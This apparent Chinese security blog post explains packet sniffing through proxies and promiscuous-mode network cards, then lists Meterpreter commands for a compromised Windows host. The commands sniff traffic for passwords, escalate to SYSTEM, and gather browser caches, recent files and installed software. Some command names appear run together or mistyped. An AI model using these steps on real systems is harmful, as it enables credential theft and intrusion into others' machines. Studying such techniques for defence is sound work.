声明：禁止用作非法目的，谢绝一切形式的转载。

当你在登陆某个网站的时候，当你在用ftp登陆传输文件的时候，你的密码可能已经被嗅探到了。黑客利用网络嗅探可以获取大量有用的信息。

预备条件

1. 生成木马，可参考
2. 获取meterpreter，可参考

网络抓包

抓取数据包通常有两种方式，一种时基于代理服务器的，像Burpsuit、Fiddler等，另一种就是基于网卡，最著名的就是Wireshark。这里主要指的是抓取web的数据流。

代理服务器

代理服务器英文全称是（Proxy Server），其功能就是代理网络用户去取得网络信息。形象的说：它是网络信息的中转站。代理服务器就好象一个大的Cache，这样就能显著提高浏览速度和效率。更重要的是：Proxy Server（代理服务器）是Internet链路级网关所提供的一种重要的安全功能

下图展示了数据流的走向，很明显，这就是大名鼎鼎的"中间人攻击"，所有的数据流都要走代理服务器，因此代理服务器能截获所有的数据流。Burpsuit以及Fiddler等都是基于这种原理。

	
	

		sequenceDiagram
	

	

		浏览器 ->> 代理服务器: ssl client hello
	

	

		代理服务器-->>浏览器: 代理服务器的证书(C1)
	

	

		代理服务器->>真正服务器: ssl client hello
	

	

		真正服务器-->>代理服务器 : 真正服务器的证书(C2)
	

网卡

网卡(NIC)是局域网（LAN,全称是：Local Area NetWork）中连接计算机和传输介质的接口，它工作在物理层(L1）。它是处于主机箱内的一块网络接口板，因为它的存在，从而使得本机能够与外部局域网进行连接通信。任何一台计算机，想要进行上网、通信功能，就必须使用网卡。

网络上传输的数据包通过网卡进入到网络协议分析器系统。协议分析器所使用的网卡和网卡 驱动程序必须能够支持“混杂模式操作（Promiscuous Mode Operation）”。因为只有运行在混杂模式下的网卡才能够捕获到网络中传输到其他设备的“广播数据包、多播数据包、单播数据包以及错误数据包等等”，两者一起协同工作。分析器原理图如下：

meterpreter网络嗅探

1. 加载嗅探模块 usesniffer
2. 提升权限到System getsystem 
3. 列出"肉鸡"所有开放的网络接口 sniffer_interfaces 
4. 获取正在实施嗅探网络接口的统计数据 sniffer_start3
5. dump数据包 sniffer_dump3/tmp/test3.cap
6. 用wireshark分析数据包，可以看到用户名密码都是burning 

meterpreter获取敏感数据

run post/windows/gather/checkvm #是否虚拟机

run post/windows/gather/enum_applications #获取安装软件信息

run post/windows/gather/dumplinks #获取最近的文件操作

run post/windows/gather/enum_ie #获取IE缓存

run post/windows/gather/enum_chrome #获取Chrome缓存

写在最后

尽量不要使用表单进行登陆，这个可以考虑使用div等来进行替换。对于密码传输，明文是不应该出出现的，因此像FTP这样的工具应该谨慎使用。

公众号

更多网络安全，欢迎关注我的公众号:无情剑客。